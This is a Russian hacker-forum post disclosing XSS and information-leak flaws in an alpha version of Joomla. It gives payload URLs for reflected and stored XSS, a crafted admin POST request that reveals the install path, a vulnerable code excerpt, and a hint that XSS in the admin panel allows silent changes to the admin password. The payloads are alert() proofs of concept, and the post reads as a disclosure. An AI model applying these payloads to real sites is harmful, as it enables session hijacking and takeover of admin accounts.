Форум АНТИЧАТ - Уязвимости в Joomla v 1.1.0 Alpha 2

Ууу, как загорелись мои глазки при виде спец хакера за май. От чего же? Да потому что он про
Web-coding и я нутром чувствовал, что там должны быть свеженькие cms, свежезалатанные, или
ещё не осквернённые рукой хакера движки! Так и вышло. Первой мне приглянулась
Joomla v1.2.0 Alpha 2... Вот он результат моих поисков:

.........:: Passive XSS ::.........
.
.
. 1) http://ya.ru/joomla/index.php?option=com_syndicate&feed=<script>alert( "b00zy_c0d3r loves the bugZzzz=)")</script>&type=com_frontpage&Itemid=1
.
. Кусок бажного кода:

Код:

function saveFeed($filename="", $displayContents=true) {

                if ($filename=="") {

                        $filename = $this->_generateFilename();

                }

                $feedFile = fopen($filename, "w+");

                if ($feedFile) {

                        fputs($feedFile,$this->createFeed());

                        fclose($feedFile);

                        if ($displayContents) {

                                $this->_redirect($filename);

                        }

                } else {

                        echo "<br /><b>Error creating feed file, please check write permissions.</b><br />";

                }

        }

.
.
.2) http://ya.ru/joomla/index.php?option=com_registration&task=lostPasswor d&josmsg=<script>alert('b00zy_c0d3r loves the bugZzzz=)')</script>
.
...............................................

.........:: Trash ::.........
.
.
. 3) Передаём такой пакет: (вроде можно так и через куки, но я поленился проверять =])
.

Код:

POST /_путь_к_joomla/administrator/index2.php HTTP/1.0

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-icq, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://хакаемый сайт/joomla/administrator/index2.php?option=com_messages

Accept-Language: ru

Content-Type: application/x-www-form-urlencoded

User-Agent: lol

Host: хакаемый сайт

Content-Length: 99

Pragma: no-cache

Cookie: _тут_все_куки_от_вашего_пользователя_И_ещё_в_добавок_это ba56d3c5bf76823460c6eeba08991f74='

Connection: Keep-Alive



user_id_to=62&subject=xss_field_1&message=xss_field_2&user_id_from=62&option=com_messages&task=save

.
.
.
. В итоге получаем ошибку и немедленный редирект на другую страницу. Возвращаемся назад на страницу
. с ошибкой и можем видеть установочный путь...
......................................

.........:: BuGzz in Admin's Panel ::.........
.
.
. 4) http://ya.ru/joomla/administrator/index2.php?option=com_users&search="><script>alert (/b00zy_c0d3r/)</script>
. 5) Активная XSS присутствует в личных сообщения для админов. (Проще говоря - ПМ в админке).
. Уязвимо поле "Subject"
. 6) Перейдя в админке по этому адресу:
. http://ya.ru/joomla/administrator/index2.php?option=com_admin&task=sysinfo , можно получить
. разную системную инфу. Так вот вместе с ней там есть определение версии браузера... Ох, как я
. устал, но я всёравно люблю эту багу =). Подменив прогой RMOS Change версию (http-заголовке) вашего
. браузера на XSS-сплойт, можно получить активную XSS на той самой страничке админу
. на память.
.................................................. ......

.........:: Вкусняшка (Active XSS) ::.........
.
.
. 7) Активная XSS присутствует в профиле пользователя в поле "name" (не путать с "username").
.
. Подслащает наш пир то, что, находясь в админке мы можем свободно добавлять новых или изменять
. данные старых пользователей без подтверждающих паролей! Т.е. тот же пароль админа мы вмиг можем
. поменять на любой другой =).
. А вот и горчинка: ограничение на количество вводимых символов уязвимой переменной - 39 символов.
.
.................................................. ........

Тут багтраку и КанеЦъ, ставишь плюсик - мАлАдЕцЪ =)

З.Ы. Или это карма какая или что, но опять обошлось без инклудов и скул-инъекций =(.. Эххх
З.З.Ы На очереди следуюсчая cms из диска ;)